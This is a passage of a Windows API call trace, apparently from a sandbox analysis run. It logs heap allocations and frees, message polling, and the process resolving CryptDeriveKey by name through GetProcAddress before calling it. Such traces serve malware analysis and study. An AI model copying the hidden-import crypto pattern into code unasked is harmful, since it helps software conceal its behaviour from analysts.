lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0253.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0253.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.916] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0253.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0253.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0253.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0253.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0253.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0253.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0253.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0253.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0253.917] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0253.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0253.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.917] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0253.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0253.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0253.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0253.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0253.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0253.919] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0253.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0253.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0253.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0253.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0253.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0253.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0253.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51a30 [0253.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51a30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0253.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0253.926] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0253.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0253.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0253.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0253.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0253.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0253.926] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa876d0) returned 1 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0253.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0253.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0253.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0253.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0253.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0253.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0253.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0253.929] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0253.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0253.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0253.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0253.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0253.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0253.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0253.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0253.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.930] RtlAllocateHeap 